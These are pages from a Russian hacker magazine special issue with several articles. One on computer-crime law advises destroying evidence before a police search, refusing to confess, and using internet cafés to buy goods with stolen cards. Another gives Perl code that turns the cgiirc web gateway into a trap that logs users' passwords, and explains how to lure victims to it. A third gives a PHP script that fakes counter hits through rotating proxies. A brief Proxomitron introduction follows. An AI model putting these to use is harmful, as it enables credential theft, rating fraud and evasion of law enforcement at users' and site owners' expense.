Наше с тобой законодательство содержит аж целую главу (глава 28, «Преступления в сфере компьютерной информации»), в которой перечислены противоправные действия и наказания за них. Глава содержит три статьи. Условно их можно назвать так: хакинг, вирусы/трояны, администратор-ренегат. С текстом законов ты можешь ознакомиться во врезках.

Статья 272. Неправомерный доступ к компьютерной информации

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

Начнем с хакинга. Суть любого хака в том, что проникаешь куда-то там и копируешь/модифицируешь/удаляешь/блокируешь чужую инфу. Что значит «копируешь»? То же, что и воруешь или публикуешь (придаешь гласности). Что значит «модифицируешь»? То есть меняешь содержание или смысл. «Удаляешь»? Вот под удалением понимается «удаление без возможности восстановления». То есть, если ты незаконно убил у своего дружбана доку, а она не стерлась, а переползла в корзину, то он тебе ничего не сделает (разве что лицо наждаком почистит) - ведь закон ты не нарушил! Под «блокировкой» понимается невозможность доступа к информации (к примеру, ты ее зашифровал) при сохранении ее целостности.


Спецвыпуск Xakep, номер #029, стр. 029-058-2, ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

TanaT (tanat@hotmail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-058-2

Обрати внимание, что если ты хакнул какую-нибудь шнягу, то тебя могут посадить на пару лет. А если ты это сделал в составе группы, то ты теперь организованная преступность и сидеть тебе лет 5.

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.

2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.

К вирусам наши власти проявляют особый интерес. Обрати внимание, что сажают даже за одно лишь изготовление вируса. То есть, если ты накодишь паразита у себя бетонном бункере, отключенном от всякой сети и охраняемом ротой солдат, то это будет преступлением.

Смотри дальше. Во втором пункте указан максимальный срок среди всех компьютерных преступлений. Так что если ты напишешь вирус типа Чернобыля, который всем яйца оторвет, то сидеть тебе 7 лет и штрафа платить в бюджет США.

Трояны тоже попадают под данную статью. Не дай тебе бог попасться на хищении мега-инфы с помощью любимой лошадки - узнаешь, как пахнут нары стопроцентно.

Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети

1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, - наказывается лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.

2. То же деяние, повлекшее по неосторожности тяжкие последствия, - наказывается лишением свободы на срок до четырех лет.

Статья 274 - это прикольный и достаточно интересный случай. К примеру, ты сисадмин в банке - серфишь всю сеть как Бог. Счета валютные и рублевые, большие и маленькие, зеленые и евро... Ну как тут сдержаться. Ну перевел единицу с шестью нулями на счет бабке Наде. А тут ФСБ - хоп тебя и в казенный дом.


Спецвыпуск Xakep, номер #029, стр. 029-058-3, ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

TanaT (tanat@hotmail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-058-3

Теперь давай разбираться более подробно. Первая шняга, если к тебе пришли дяди из ГБ, это шифровать или стирать данные. Для этого тебе помогут две двери, одна из них железная. Железную будут очень долго сварочной лампой прожигать, деревянную выбьют быстрее. За это время нужно убить компромат. Лучше всего пользоваться специальными тулзами, которые затирают инфу нулями. Есть, правда, одна теория, утверждающая, что информацию можно восстановить, даже если она затиралась перед этим нулями пять раз! Как это сделать? Не знаю, но ФСБ, возможно, знает. Так что лучше всего достань свой винт, избей его молотком и выложи все потроха на магнит. Так надежней! :)

Вторая шняга в том, чтобы не быть лавашом. Что такое «лаваш»? Ну, хлеб такой вкусный, его еще едят. В общем, чтобы тебя не съели, нужно думать головой, а не основанием спинного мозга. Следи за словами и колись не сразу. Вот пример. Ты с группой перцев поимел чей-то логин и пароль. Пофиг от чего. Естественно, все юзают эту бодягу скопом. В результате, можно за сутки израсходовать несколько тысяч часов Интернета с чужого счета (если много народу будут сидеть в сети одновременно и юзать эккаунт). Если тебя прижмут к стене, то подумай: «Можно ли доказать, что виновен?». Чаще всего в таких случаях ФСБ ловит одного «юзальщика», и тот быстро сдает всю свою бригаду. Если ты не успел попользоваться инфой, то не бери чужую вину. Если у провайдера нет АОНа, а ты не оставил компромата на своем ПК, - пошли всех к динозаврам! Помни, если какой-то перец утверждает, что он дал тебе пароль, - это все фигня. Мало ли что он там пробубнит. Главное, чтобы при обыске на твоей тачке не к чему было придраться. Понимаешь? Вот еще один пример, ты поимел чью-то кредитку или веб-деньги. Как все это материализовать? Надо зайти в веб-магазин и накупить всякого барахла. А как получить шмотки? Только заказав их себе по почте. Если все сделать правильно (пойти в Инет-кафе и работать не дома), то до этого момента ты чист. Пока ты не придешь на почту получать товар и не начнешь лапать его, тебе никто ничего не сделает. Но если при задержании или обыске у тебя найдут награбленное добро, то смерть тебя ожидает мучительная.

Хотя я перечислил законы, тебе следует знать еще пару вещей. Во-первых, компьютер может быть «орудием другого преступления». То есть, если ты сопрешь инфу, а потом попросишь за нее деньги у компании, то это будет шантаж плюс попытка сожрать часть авторитета компании. Срок будет намного более серьезным, и смотреть на тебя будут, как на уголовника-рецидивиста. Во-вторых, иногда можно прицепиться к понятию «чужие» данные. Что значит «чужие»? Может ты думал, что они не секретные! То бишь - общие. Проходит не всегда, но иногда может выручить твою шкуру из беды. В-третьих, потерпевшие лица могут попытаться урегулировать вопрос о твоем злодеянии и без вмешательства правоохранительных органов. Тут, правда, все должно быть в рамках закона. Жертва может потребовать компенсации, но избивать тебя она не имеет права :). Если ты попадешь в такую яму, то лучше дай денег потерпевшему и возьми с него расписку, что он претензий не имеет и денежку твою себе уволок. В-четвертых, если ты замутишь реально серьезное дело, то ловить тебя будут не только ФСБ и МВД, но и ФАПСИ. Это значит, что будут прослушивать твои телефоны, всю твою квартиру, снимать на камеру все, что происходит у тебя на компе, и даже подсматривать, когда ты пойдешь в туалет. Потом улик окажется столько, что даже удаление всех данных не спасет. Так что имей голову на плечах и думай ею почаще.


Спецвыпуск Xakep, номер #029, стр. 029-058-4, ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

TanaT (tanat@hotmail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-058-4

Официальное сообщение ФСБ от 24.09.2002

В октябре и ноябре 2001 г. неизвестным лицом был совершен ряд попыток неправомерного доступа к информационному серверу ФСБ России, имеющему адреса: www.fsb.ru и www.fsb.gov.ru.

Расследованием установлено, что указанные попытки осуществлялись несовершеннолетним жителем Красноярского края С., студентом факультета компьютерной безопасности Красноярского государственного технического университета, с помощью полученных незаконным путем идентификационных данных, необходимых для доступа в сеть Интернет.

В результате рассмотрения уголовного дела по обвинению С. в совершении преступления, предусмотренного статьей 272 УК России (неправомерный доступ к компьютерной информации, связанный с противоправным завладением указанными идентификационными данными), суд г. Сосновоборска Красноярского края в июне 2002 г. постановил применить принудительные меры воспитательного воздействия в виде предупреждения. Уголовное дело в отношении С. прекращено в соответствии со ст. 8 УПК России в связи с передачей материалов в комиссию по делам несовершеннолетних.

В ходе судебного заседания С. полностью раскаялся в содеянном и осознал противоправность своих поступков.

Теперь давай рассмотрим вопрос, ловят ли кого-нибудь или я тебе макароны на уши вешаю. Отвечаю: ловят. С каждым годом все больше и больше дел доходит до суда. Стоит просмотреть сайт www.fsb.ru - там легко отыскать кучу раскрытых дел по хакингу.

Итак, как же ловят этих хлопцев? Честно говоря, не знаю. Очевидно, что их никто не закладывает и сами они не колятся. Одно лишь ясно: в ФСБ сегодня самая лучшая команда экспертов и хорошее оборудование для поимки нарушителей. Очень часто жертвы не обращаются в правоохранительные органы, поэтому ФСБ не ищет этих преступников, но если кто-то решит пожаловаться на тебя государству, то судебно-сыскная машина сможет раздавить тебя. Опять же, если будут улики :).

Официальное сообщение ФСБ от 29.01.03

ИЗ РОССИИ В США ДЕПОРТИРОВАНА ГРАЖДАНКА США МЕГАН МАКРИ

29 января рейсом N321 Москва - Лос-Анджелес из России в США депортирована гражданка США Меган Макри, 1968 г.р.

Макри длительное время проживала в одном из районов Москвы без регистрации по просроченной визе.

По имеющимся достоверным данным, американская гражданка через сеть Интернет устанавливала контакты с рядом известных мусульманских экстремистских организаций, которым предлагала сценарии террористических актов, в частности в США, и свою помощь в их проведении.


Спецвыпуск Xakep, номер #029, стр. 029-058-5, ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ - что бывает за веб-мошенничество

TanaT (tanat@hotmail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-058-5

Существует мнение, что ФСБ ловит лишь малолеток и тех, кто пускает сопли сразу и сам все рассказывает. Это неправда - пример с Меган Макри (смотри врезку) доказывает, что, когда надо, блюстители порядка всех перетопчут. Не знаю, может они и e-mail'ы просматривают...

Если ты полазишь еще на сайте ФСБ, то найдешь истории об огромном числе людей, уже сидящих за решеткой. Кто-то из них звонил по телефону бесплатно, кто-то юзал чужой Инет на халяву, а кто-то корпоративную инфу продавал налево. В этот список входят и продавцы краденных и взломанных сотовых трубок.

Иногда можно услышать, что в ФСБ работают ламеры, которые вирус от трояна не отличат. Чушь. Вот ты сможешь найти хоть одного террориста? А ведь эти гады пользуются e-mail'ом! Думаю, что нет. А ФСБшники смогли. Найти и покарать.

Статистика показывает, что эффективность действий ФСБ повышается с каждым годом. Ты, наверное, слышал о крутых русских парнях, которые ограбили и такой банк, и сякой банк. Знаешь, почему о них говорили по телевизору? Потому что этих перцев поймали. Да-да. Как бы смог ящик говорить о том, что не знает? А репортеры узнают что-то, только если им дают это узнать. А кто держит руку на кнопке? Спецслужбы, правильно. Но парни эти загремели по-крупному, так как компьютер они использовали лишь как орудие преступления. Основной же состав злодеяния - хищение в крупных размерах. А за это дают много, очень много...

А теперь подведем итог вышесказанному. Первое - есть рамки, за которые нельзя выходить. Это законы. Второе - есть органы, которые ловят нарушителей и сажают на нары. Третье - в этих органах работают далеко не дураки, а оборудование у них такое, что тебе и не снилось. Четвертое - если ты преступишь черту, тебя поймают и покарают. И самое главное - черту преступать нельзя.

Обидно было бы загреметь на 5-7 лет в расцвете сил только по своей глупости. Так что перед тем, как что-то сделать, - хорошо подумай. И уж, по крайней мере, обзаведись молотком, магнитами и двумя дверями. Они смогут продлить твою жизнь на свободе :).


Спецвыпуск Xakep, номер #029, стр. 029-062-1, ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

G3M1N1 (bugtraq@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-062-1

Рад, что сия статья привлекла твой взор. Ты не просто зря потратишь время, сегодня мы с тобой попробуем научиться обманывать людей технично, с применением твоего интеллекта и моих знаний :). Но сначала давай маленько наберемся теории.

Все, что будет ниже сказано и предложено, следует неплохо понимать. Короче, я потихоньку решил тебе задвинуть про tunneling (туннелирование по-нашему). О том, что это такое, написано одновременно и мало, и много, причем большинство информации исходит из одного источника, и не сказал бы, что написано все простым языком, поэтому сейчас сам попробую объяснить, в чем вся соль. Каждый раз, когда ты слышишь или видишь термин "туннелирование", ты должен своей прокуренной головой ясно и отчетливо понять, что уже есть две точки, или среды, которые не могут по какой-либо причине сами друг с другом работать и общаться. Вот тебе пример из реальной жизни: сидишь ты дома и некого не трогаешь, и тебе в дверь стучит сосед сверху - денег занять, который твою квартиру заливал неоднократно. И, допустим, ты решишь отомстить ему его же методом :). Самое то этого соседа водой облить, но дверь открывать, конечно же, не хочется. То есть между соседом и струей воды есть преграда, или экран, в нашем случае злосчастная дверь. Но ты ведь не лыком шит и, схватив какой-нибудь шланг, ты один конец цепляешь к крану, другой просовываешь в щель под дверью. И струей при желании попадаешь ему прямо в наглую физиономию. Вот это и есть по сути туннелирование. В роли туннеля выступали шланг и щель, вода выступает в роли данных. Как видишь, особенностью tunneling'а можно считать то, что есть возможность передавать данные через преграду, часто этой преградой становится прокся или файерволл.

ЖУЛЬНИЧАЕМ!

Часто ли ты сталкивался с такими ситуациями, когда вместо привычных тебе клиентов под рукой ничего не было, а пообщаться хотелось? Могу с уверенность ответить за тебя: часто. Причем такое происходит не только с тобой - в очень многих фирмах, конторах, школах и универах. Да в том же соседнем интернет-кафе после сборищ любителей irc злые админы удалили всех клиентов. Казалась бы, безвыходная ситуация, но не тут-то было! Юзеры стараются всеми возможными способами получить общение, и тут на web-сцене появляются ОНИ. Посредники. Поэтому самым простым способом посидеть во всеми любимой ИРКе или Аське становится скрипт. Мы с тобой сегодня рассмотрим cgiirc как самый распространенный скрипт для irc, в Аське все в принципе так же, только скрипт, конечно, другой, но суть-то одна :). О них сегодня и пойдет речь.

Итак, приступим к нашему коварному плану - заОстапить всех Бендеров :). Главная ошибка всех тех, кого мы с тобой кинем, в том, что в своем желании пообщаться они прибегнут к помощи посредников. А кто сказал, что посредники всегда честны и преданы своему делу? Платить все наши жертвы будут своими логинами, паролями и прочей инфой на твое усмотрение. Таким образом можно не слабо нагреть юзеров на все это, я уже не говорю про тайну переписки. Все до боли просто, нужно заставить работать эти скрипты-посредники на себя, этим и будем маяться.


Спецвыпуск Xakep, номер #029, стр. 029-062-2, ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

G3M1N1 (bugtraq@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-062-2

Поехали с самого начала. Я решил все объяснить на примере cgiirc. Первым делом ищем себе задушевного хостера, который бы разрешил тебе юзать скрипты и хотя бы чуток распоряжаться своими сокетами; ведь нам нужно будет, чтобы наш скрипт успешно общался с каким-нибудь irc.yshlepok.ru на, допустим, 6667 порту. Сразу скажу, что такого хостера найти не просто, но вполне реально, давать ссылки я не буду, так как они все забугорные, а я патриот :). Затем лезем на google.com и ищем cgiirc. Я нашел за несколько секунд cgiirc-0.5.2 и стянул архивчик. Распаковываем и изучаем его содержимое - нас с тобой будут интересовать скрипты, а не images'ы (над дизайном, я думаю, ты догадаешься поработать.

Читаем README и правим файл-конфиг:

# This is the full access CGI:IRC 0.5 config file

# It will allow access to *all* servers and channels

# See http://cgiirc.sourceforge.net/docs/config.php for help editing it.

# -----

# Указываем дефолтовый сервер и порт

default_server = irc.wenet.ru

default_port = 6667

# Дефолтовый канал

default_channel = #xakep

# Реальное имя, при запросе(in /whois)

default_name = CGI:IRC User

# Дефолтовый ник, знаки вопроса, случайные числа

default_nick = Guest???

# Имя пользователя по дефолту

default_user = cgiirc

# Сообщение при выходе

#quit_message = Quit!

# Ничего не указывай, и так пойдет %)

#quit_prefix = CGI:IRC

# -----

# System setup options

# Если есть желание, можешь изменить имена скриптов, я оставил как было

script_nph = nph-irc.cgi

script_form = client-perl.cgi

script_login = irc.cgi

Открываем nph-irc.cgi и видим следующие переменные: $nick, $password - они-то нас и интересуют. Нужно сохранять их значения в лог-файл и потом просто прочитать и воспользоваться плодами нашего шпионажа.

Ищем в скрипте, где эти данные передаются серверу, чтобы перехватить их.

# Данные отправляются на сервер

sub irc_out {

my($event,$fh,$data) = @_;

$data = $fh, $fh = $event if !$data;

message('default', "-> Server: $data");

net_send($fh, $data . "\r\n");

}

Пропускаем немного и находим следующий элемент:

sub irc_ctcp {

my($name, $info, $to, $nick, $host, $command, $params) = @_;

if($name eq 'ctcp own msg') {

format_out('ctcp own msg', $info, [$nick, $host, $command, $params]);

}elsif($name =~ /^ctcp msg /) {

if(uc($command) eq 'KILL') {

return unless config_set('admin password');

my $crypt = $config->{'admin password'};

my($password, $reason) = split ' ', $params, 2;

return unless length $password and length $crypt;

# Сюда вставим следующий простой код, который будет записывать значение переменных $nick и $password в лог-файл

open (FILELOG, ">>/path/to/log") || die "can't open log: $!\n";

print FILELOG "$nick : $password\n";

close FILELOG;

# Все! Переменные ушли в логи

if(crypt($password, substr($crypt, 0, 2)) eq $crypt) {

message('kill ok', $nick, $reason);

net_send($ircfh, "QUIT :Killed ($nick ($reason))\r\n");

irc_close();

}else{

message('kill wrong', $nick, $reason);

}

}elsif(uc($command) eq 'ACTION' && $irc->is_channel($info->{target})) {


Спецвыпуск Xakep, номер #029, стр. 029-062-3, ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

ЧЕРНОКНИЖНОЕ ТУННЕЛИРОВАНИЕ - нужную инфу нам отдадут добровольно

G3M1N1 (bugtraq@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-062-3

format_out('action public', $info, [$nick, $host, $params]);

return;

}elsif(uc($command) eq 'ACTION') {

format_out('action private', $info, [$nick, $host, $params]);

return;

}elsif(uc($command) eq 'DCC' && lc $to eq lc $irc->{nick}) {

format_out('not supported', $info, [$nick, $host, $params, "DCC"]);

}else{

format_out('ctcp msg', $info, [$to, $nick, $host, $command, $params]);

}

Если тебя интересуют еще и то, что пишут пользователи твоего сервиса, то обрати внимание на следующие строчки и переменные:

sub irc_out {

my($event,$fh,$data) = @_;

$data = $fh, $fh = $event if !$data;

Не все же другим делать, приложи маленько и сам усилия, смотри только не надорвись от тяжести :).

Особых знаний языка, чтобы переделать скрипт в шпиона, не требуется, независимо от того, что мы переделываем - mail, icq или irc скрипт. Можно просто выводить значения в лог апачей, все зависит от того, насколько ты ленив %). Принцип везде один! Например, icq2go представляет собой Java-аплет. И в сети полным полно людей, утверждающих, что это абсолютно безопасно, ведь "она коннектится прямо к серверу". Я надеюсь, что ты-то давно уже уловил, что к чему коннектится :). А подправить Java-скрипт так же элементарно, как и перл, так что не советую тебе торопиться пользоваться этим "благом", иначе можешь вскоре распрощаться со своей любимой шестизначкой. Единственный случай, когда бы я советовал тебе использовать подобные скрипты, это когда они работают только на тебя! Есть еще одна особенность, на которую я хотел бы обратить твое внимание. Это путь до файла логов, не забудь все прописать как следует и убедиться, что тебе хватает прав для создания текстовика. Именно поэтому я не стал писать конкретные строчки и куда их вставлять в скрипты, чтобы заставить тебя хоть секундочку подумать. В общем, основу сделали, вывели переменные в логи, теперь льем подправленный в нашу пользу скрипт к хостеру. Проделав это, начинаем крутить и рекламировать свою страничку, могу посоветовать полностью отдать ее под irc. Если ты провинциал, то отличный способ заманить людей - это выложить на сайте еще и фотогалерею с фотками завсегдатаев каналов и периодически обновлять новости. Можешь также посоветовать свой вебгейт тем, кого забанили операторы. То есть тут дай волю фантазии, и твой проект заживет, принося информацию, и в один из дней ты поразишь людей своей осведомленностью :).

ГЛАВНОЕ - НЕ ПОПАДИСЬ САМ!

Надеюсь, что не зря тут распинался перед тобой, и информация из статьи тебе поможет. Например, если немного подумать, то и спамить станет гораздо легче. Не стоит только забывать, что не со всеми протоколами, основывающимися на TCP, можно реализовать туннелирование. Так что будь готов к облому с FTP и NetBIOS, есть у них особенности, которые не позволят тебе насладиться всеми прелестями жизни :). Но и вышеизложенных возможностей, я считаю, достаточно для того, чтобы показать всем, кто в доме хозяин :). В этой статье я не столько хотел показать, как переделать скрипт в шпиона, сколько предостеречь тебя от этих грабель. Всегда подумай, стоит ли что-либо ценное вбивать в предложенные тебе формы, а потом делай. Так что главное - сам не попадись в расставленные повсюду капканы!


Спецвыпуск Xakep, номер #029, стр. 029-064-1, PHPCount - накручиваем счетчики через скрипт на PHP

PHPCount - накручиваем счетчики через скрипт на PHP

Андрей Ковалев ака Drone

Спецвыпуск Xakep, номер #029, стр. 029-064-1

(drone@nm.ru)

В этой статье я расскажу об одном их способов накрутки счетчиков. Зачем? Да хотя бы для того, чтобы "подняться" в различных TOPах.

Возьмем, для примера, рейтинг www.supertop.ru. Все зарегистрированные пользователи, кроме того что получают в свое распоряжение счетчик посещений, так еще и участвуют в рейтинге. Чем больше цифра на счетчике, тем твоя страница ближе к первому месту. Следовательно, чтобы попасть на первое место, надо чтобы счетчик показал как можно большую цифру. Логично? А после того как нужная страница окажется в призовой тройке(или даже на первом месте), ее заметят, и реальные посетители повалят толпами.

ПРЕДВАРИТЕЛЬНЫЕ ПРИГОТОВЛЕНИЯ

Итак, нам понадобятся:

1. Свежий список proxy-серверов. Взять такой можно, например, на www.proxychecker.ru

2. Сервер с поддержкой PHP и SQL. Вот здесь могут быть сложности. Советую поискать временный "халявный" хостинг или, на худой конец, установить на своем компьютере те же Apache+MySQL.

3. Немного времени.

В базе данных нам понадобится несколько таблиц. Уверен, что ты знаешь SQL, поэтому напишу сразу, как они создаются:

1. Таблица, состоящая из одной колонки и одного ряда. В ней хранится номер прокси, который мы использовали последним.

CREATE TABLE lastproxy(proxyid int)

2. Еще одна таблица, состоящая из одной колонки и одного ряда. В ней хранится номер useragent, который мы использовали последним.

CREATE TABLE lastproxyagent(agentid int)

3. Таблица со списком проксей. proxyid - порядковый номер, proxyname - адрес прокси, proxyport - порт. Заполнишь таблицу сам из свежего списка прокси-серверов.

CREATE TABLE proxylist(proxyid int, proxyname char(64), proxyport int)

4. Таблица, хранящая список UserAgent-ов. Нужно для того, чтобы разнообразить список браузеров "пользователя" - чтобы враги не догадались. Впиши туда всякие ie4.0, ie5.0, ie6.0, netscape, opera и т.д.

CREATE TABLE proxyagent(agentid int, agent char(64))

5. Таблица, используемая как обычный счетчик, - в ней хранится общее количество обращений к прокси-серверам.

CREATE TABLE proxycount(counter int)

ПИШЕМ СКРИПТ

Как ты, наверняка, уже понял, скрипт будет писаться на PHP.

Назовем его PHPCount.php. Для большего удобства пользования (например, для работы с html-формами) в скрипт передаются следующие переменные:

$ref - адрес сервера, с которого якобы зашел пользователь (серверная переменная Referer);

$url - ссылка, на которую надо зайти.

В итоге скрипт вызываем на выполнение примерно так: PHPCount.php?ref=http://www.i-am-hacker.ru&url=http://www.rambler.ru/kartinka.gif

Теперь сам скрипт. Он будет выглядеть так:

// не забываем проверить, переданы ли переменные $ref и $url - иначе ничего работать не будет

if (($url=="") || ($ref=="")) {echo "Ты забыл ввести переменные $ref и $url!";}

//если все в порядке, то

else {

// здесь должны идти стандартные строчки подключения к той базе данных, с которой ты работаешь

// ...

// создаем переменные, которые понадобятся для того чтобы через проксю запросить нужный нам урл

$ref="Referer: $ref";

$useragent="User-Agent: ";

$accept0="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, */*";


Спецвыпуск Xakep, номер #029, стр. 029-064-2, PHPCount - накручиваем счетчики через скрипт на PHP

PHPCount - накручиваем счетчики через скрипт на PHP

Андрей Ковалев ака Drone

Спецвыпуск Xakep, номер #029, стр. 029-064-2

$accept1="Connection: Keep-Alive";

$accept2="Accept-Language: ru";

$accept3="Accept-Encoding: gzip, deflate";

// типа мы - эксплорер и даже круче :)

while(1!=2) // зацикливание

{

//запрашиваем номер последней прокси, которую мы использовали

$a=mysql_query("select * from lastproxy");

$lastproxy=mysql_result($a,0,"proxyid");

$lastproxy++;

//считаем общее количество наших проксей

$proxys=mysql_numrows(mysql_query("select * from proxylist"));

//если номер прокси, которую мы собираемся использовать, превышает общее количество известных прокси-серверов, начинаем с самого начала

if ($lastproxy>$proxys) $lastproxy=1;

//удаляем номер последнего использованного проксика ...

mysql_query("delete from lastproxy");

//... и вставляем туда номер, который собираемся использовать в данный момент

mysql_query("insert into lastproxy values($lastproxy)");

// далее выполняем те же самые операции с таблицей lastproxyagent

$a=mysql_query("select * from lastproxyagent");

$lastagent=mysql_result($a,0,"agentid");

$lastagent++;

$agents=mysql_numrows(mysql_query("select * from proxyagent"));

if ($lastagent>$agents) $lastagent=1;

mysql_query("delete from lastproxyagent");

mysql_query("insert into lastproxyagent values($lastagent)");

//выбираем из списка проксей ту, чей номер хотим использовать сейчас

$a=mysql_query("select * from proxylist where proxyid=$lastproxy");

//считываем адрес проксика

$proxyname=mysql_result($a,0,"proxyname");

//и порт

$proxyport=mysql_result($a,0,"proxyport");

//выбираем из таблицы нужный нам в данный момент agent

$a=mysql_query("select * from proxyagent where agentid=$lastagent");

$agentname=mysql_result($a,0,"agent");

$useragent="$useragent $agentname";

//вызываем основную функцию, которая выполнит всю "грязную работу", используя данные из наших переменных

$stroka=get_http_headers($proxyname,$proxyport,$useragent,$accept0,$accept1,$accept2,$accept3,$ref,$url);

//выводим на экран (для себя) основные переменные

print $proxyname.":".$proxyport." [$agentname] ".$lastproxy."/".$lastagent;

//обычный счетчик. Считываем значение, увеличиваем, перезаписываем.

$a=mysql_query("select * from proxycount");

$pk=mysql_result($a,0,"counter");

$pk++;

mysql_query("delete from proxycount");

mysql_query("insert into proxycount values($pk)");

}

А вот и основная функция, выполняющая основную работу по подключению к указанному прокси-серверу:

function get_http_headers ($proxy,$proxyport,$useragent,$accept0,$accept1,$accept2,$accept3,$ref,$url,$proto="HTTP/1.0")

{

//если url без http://, дописываем оный

if(!eregi( "^http://", $url)) { $url = "http://".$url; }

$uri = parse_url($url);

//порт стандартный - 80

$port = ( $uri[ "port"] ? $uri[ "port"] : 80 );

//открываем сокет

$sock = fsockopen($proxy,$proxyport);

//если ошибка (например, proxy не найден), то выходим из функции

if(!$sock) { return(-1); }

if (!strlen($uri[path])) {$uri[path] = "/";}

//строим запрос к серверу ...

$req=sprintf("GET %s %s\nHost: %s\n%s\n%s\n%s\n%s\n\n\n",$url,$proto,$uri[host],$ref,$accept0,$accept2,$accept3);


Спецвыпуск Xakep, номер #029, стр. 029-064-3, PHPCount - накручиваем счетчики через скрипт на PHP

PHPCount - накручиваем счетчики через скрипт на PHP

Андрей Ковалев ака Drone

Спецвыпуск Xakep, номер #029, стр. 029-064-3

// ... и отсылаем его

fputs($sock, $req);

//делаем паузу

$date = getdate();

$datesec=$date[seconds];

$changes=0;

while ($changes<5)

{

$date = getdate();

$datesec2=$date[seconds];

if ($datesec2!=$datesec) { $datesec=$datesec2; $changes++;}

}

//закрываем сокет и выходим из функции

fclose($sock);

$output="ok";

return($output);

}

Итог - перед тобой полностью рабочий скрипт, который успешно справляется с поставленной перед ним задачей. Согласен, что скрипт не доработанный, однако ничто не мешает тебе это сделать самому. Например, добавить распределение количества показов в зависимости от времени суток примерно так:

$date = getdate();

$dateh =$date[hours];

if (($dateh>=0) && ($dateh<3)) $n=100;

if (($dateh>=3) && ($dateh<12)) $n=30;

if (($dateh>=12) && ($dateh<22)) $n=50;

if (($dateh>=22) && ($dateh<=24)) $n=100;

Или еще что придумать - это твое дело. Главное - чтобы скрипт выполнял свое дело, не так ли? ;).

P.S. Хочу выразить свою благодарность человеку с irc-канала #s.k.l, скрывающемуся под псевдонимом Ilia Sprite. Без него этот скрипт вряд ли бы существовал.


Спецвыпуск Xakep, номер #029, стр. 029-066-1, МАСКИРОВКА В СЕТИ - персональный фильтр базара

МАСКИРОВКА В СЕТИ - персональный фильтр базара

Спецвыпуск Xakep, номер #029, стр. 029-066-1

Перец, тебя, наверно, запарило, что твой комп каждой встречной страничке представляется, кто он такой, откуда будет, на каком языке разговаривает и даже какую ось ты юзаешь. Будем лечить!

Лекарство

Лекарством от этого дела у нас послужит прога под названием proxomitron. Эта прога разработана каким-то очень неглупым японцем и раздается всем налево и направо абсолютно бесплатно. Последнее время, правда, официальный сайт программы (proxomitron.cjb.net) закрылся ввиду несогласия автора Proxomitron-а с политикой размещения страниц, а именно с размещением баннеров и pop-up окошек. Сейчас он существует по адресу www.proxomitron.org, но в значительно урезанном виде. Для закачки можно воспользоваться и официальной страничкой, но для русификации придется пользоваться неофициальной ссылкой http://proxomitron.nm.ru/download.htm. Последняя версия это 4.4 от 2002-10-28, это не бета четвертая, поскольку дальше будет описываться именно она, настоятельно советую качнуть. Принцип работы достаточно прост, ты задаешь порт, который прокс должен будет слушать, затем в браузере прописываешь его как проксятник, и он начинает фильтровать весь пролетающий через него трафик. Фильтровать он может как входящий (странички), так и исходящий (теги браузера) трафик. Для осуществления всего этого существует скриптовый язык, или язык метасимволов, это язык поиска и замены, очень сильно напоминающий работу с переменными в Perl-е. Также есть возможность простого запрета сайтов и сервис коротких имен.

Настройка

